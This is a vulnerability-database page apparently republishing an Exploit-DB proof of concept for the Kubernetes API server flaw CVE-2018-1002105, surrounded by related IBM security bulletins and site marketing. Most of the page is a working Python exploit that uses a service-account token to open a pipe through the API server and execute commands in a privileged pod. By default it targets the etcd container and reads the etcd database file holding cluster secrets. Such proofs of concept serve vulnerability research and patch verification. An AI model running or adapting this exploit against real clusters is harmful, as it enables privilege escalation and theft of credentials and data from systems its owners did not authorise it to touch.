Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Kubernetes - (Authenticated) Arbitrary Requests

🗓️ 10 Dec 2018 00:00:00Reported by evictType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 61 Views

Kubernetes Authenticated Arbitrary Requests PoC for CVE-2018-1002105

Related
Code
ReporterTitlePublishedViews
Family
IBM Security Bulletins		Security Bulletin: IBM Cloud Private for Data is affected by a privilege escalation vulnerability in Kubernetes API server
3 Oct 201922:50
ibm
IBM Security Bulletins		Security Bulletin: IBM Cloud Private is affected by a privilege escalation vulnerability in Kubernetes API server
7 Dec 201817:50
ibm
IBM Security Bulletins		Security Bulletin: Multiple Vulnerabilities in Kubernetes affects IBM Watson Studio Local
20 Dec 201913:53
ibm
IBM Security Bulletins		Security Bulletin: A Security Vulnerability Has Been Identified In IBM Cloud Private shipped with IBM Cloud Private for Data - CVE-ID: CVE-2018-1002105
3 Oct 201922:50
ibm
IBM Security Bulletins		Security Bulletin: Multiple vulnerabilities affect IBM® Db2® On Openshift and IBM® Db2® and Db2 Warehouse® on Cloud Pak for Data
29 Jun 202217:05
ibm
IBM Security Bulletins		Security Bulletin: IBM API Connect is affected by a critical privilege escalation vulnerability in Kubernetes (CVE-2018-1002105)
18 Dec 201816:05
ibm
IBM Security Bulletins		Security Bulletin: IBM Cloud Kubernetes Service is affected by a privilege escalation vulnerability in Kubernetes API server
6 Dec 201816:25
ibm
IBM Security Bulletins		Security Bulletin: A Security Vulnerability Has Been Identified In IBM Cloud Private shipped with IBM Event Streams CVE-ID: CVE-2018-1002105
7 Dec 201817:00
ibm
0day.today		Kubernetes - (Authenticated) Arbitrary Requests Exploit
24 Dec 201800:00
zdt
0day.today		Kubernetes - (Unauthenticated) Arbitrary Requests Exploit
24 Dec 201800:00
zdt
Rows per page
#!/usr/bin/env python3
import argparse
from ssl import wrap_socket
from socket import create_connection
from secrets import base64, token_bytes


def request_stage_1(namespace, pod, method, target, token):

    stage_1 = ""

    with open('stage_1', 'r') as stage_1_fd:
        stage_1 = stage_1_fd.read()

    return stage_1.format(namespace, pod, method, target,
                          token).encode('utf-8')


def request_stage_2(target, namespace, pod, container, command):

    stage_2 = ""

    command = f"command={'&command='.join(command.split(' '))}"

    with open('stage_2', 'r') as stage_2_fd:
        stage_2 = stage_2_fd.read()

    key = base64.b64encode(token_bytes(20)).decode('utf-8')

    return stage_2.format(namespace, pod, container, command,
                          target, key).encode('utf-8')


def run_exploit(target, stage_1, stage_2, method, filename, ppod,
                container):

    host, port = target.split(':')

    with create_connection((host, port)) as sock:

        with wrap_socket(sock) as ssock:
            print(f"[*] Building pipe using {method}...")
            ssock.send(stage_1)

            if b'400 Bad Request' in ssock.recv(4096):
                print('[+] Pipe opened :D')

            else:
                print('[-] Not sure if this went well...')

            print(f"[*] Attempting code exec on {ppod}/{container}")
            ssock.send(stage_2)

            if b'HTTP/1.1 101 Switching Protocols' not in ssock.recv(4096):
                print('[-] Exploit failed :(')

                return False

            data_incoming = True

            data = []

            while data_incoming:
                data_in = ssock.recv(4096)
                data.append(data_in)

                if not data_in:
                    data_incoming = False

            if filename:
                print(f"[*] Writing output to {filename} ....")

                with open(filename, 'wb+') as fd:
                    for msg in data:
                        fd.write(msg)

                    print('[+] Done!')

            else:
                print(''.join(msg.decode('unicode-escape')
                              for msg in data))


def main():

    parser = argparse.ArgumentParser(description='PoC for CVE-2018-1002105.')

    required = parser.add_argument_group('required arguments')
    optional = parser.add_argument_group('optional arguments')

    required.add_argument('--target', '-t', dest='target', type=str,
                          help='API server target:port', required=True)
    required.add_argument('--jwt', '-j', dest='token', type=str,
                          help='JWT token for service account', required=True)
    required.add_argument('--namespace', '-n', dest='namespace', type=str,
                          help='Namespace with method access',
                          default='default')
    required.add_argument('--pod', '-p', dest='pod', type=str,
                          required=True, help='Pod with method access')
    required.add_argument('--method', '-m', dest='method', choices=['exec',
                          'portforward', 'attach'], required=True)

    optional.add_argument('--privileged-namespace', '-s', dest='pnamespace',
                          help='Target namespace', default='kube-system')
    optional.add_argument('--privileged-pod', '-e', dest='ppod', type=str,
                          help='Target privileged pod',
                          default='etcd-kubernetes')
    optional.add_argument('--container', '-c', dest='container', type=str,
                          help='Target container', default='etcd')
    optional.add_argument('--command', '-x', dest='command', type=str,
                          help='Command to execute',
                          default='/bin/cat /var/lib/etcd/member/snap/db')
    optional.add_argument('--filename', '-f', dest='filename', type=str,
                          help='File to save output to', default=False)

    args = parser.parse_args()

    if args.target.find(':') == -1:
        print(f"[-] invalid target {args.target}")
        return False

    stage1 = request_stage_1(args.namespace, args.pod, args.method, args.target,
                             args.token)
    stage2 = request_stage_2(args.target, args.pnamespace, args.ppod,
                             args.container, args.command)

    run_exploit(args.target, stage1, stage2, args.method, args.filename,
                args.ppod, args.container)


if __name__ == '__main__':
    main()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
10 Dec 2018 00:00Current
8.1High risk
Vulners AI Score8.1
CVSS 27.5
CVSS 39.8
EPSS0.90189
kubernetesauthenticatedarbitraryrequestspoccve-2018-1002105api serverjwt tokennamespacepodmethod.
61